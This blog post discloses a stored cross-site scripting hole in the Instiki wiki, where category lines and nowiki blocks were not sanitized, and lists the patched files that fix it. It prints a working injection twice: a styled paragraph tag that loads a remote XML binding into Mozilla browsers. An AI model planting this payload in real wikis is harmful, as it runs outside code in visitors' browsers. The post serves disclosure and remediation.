XSS 2
How embarrassing!
Volker asked some pointed questions about the security of Instiki. I gamely tried to respond, and proffered that, among other things, Instiki has a pretty darned good XSS Sanitizer.
Well, that got me to thinking. A sanitizer is only effective on those things which it … well … sanitizes. Which prompted me to wonder: are there things which Instiki should be sanitizing, but isn’t?
Yup. Categories. Go to an unprotected Instiki wiki, edit a page and add the line
:category: <p style="-moz-binding:url('http://golem.ph.utexas.edu/~distler/blog/files/warning2.xml#xss')"></p>
When you save the page, nothing much seems amiss. But if you visit the “All Pages” or “Recently Revised” links, at the top of the page, in a Mozilla-based browser, you’ll be in for a delightful surprise.
Update (9/11/2007):
For even more immediate gratification, try inserting<nowiki><p style="-moz-binding:url('http://golem.ph.utexas.edu/~distler/blog/files/warning2.xml#xss')"></p></nowiki>
Sheesh! On an unprotected Instiki installation <nowiki> means “no sanitize.”
If you’re running a copy of my branch of Instiki, update to the latest.
Update (9/23/2007):
I was finally granted commit access to the Instiki SVN repository, and uploaded the necessary patched files to the trunk.If you’re still using the original version of Instiki, you should download
lib/sanitize.rb
lib/chunks/category.rb
lib/chunks/nowiki.rb
lib/chunks/chunk.rb
test/unit/chunks/category_test.rb
test/unit/chunks/nowiki_test.rb
Hopefully, Matthias will get a new release out the door, in the not-too-distant future.
I suppose this is not exactly going to bolster Volker’s confidence in the product. But I think I get good marks for fast turnaround.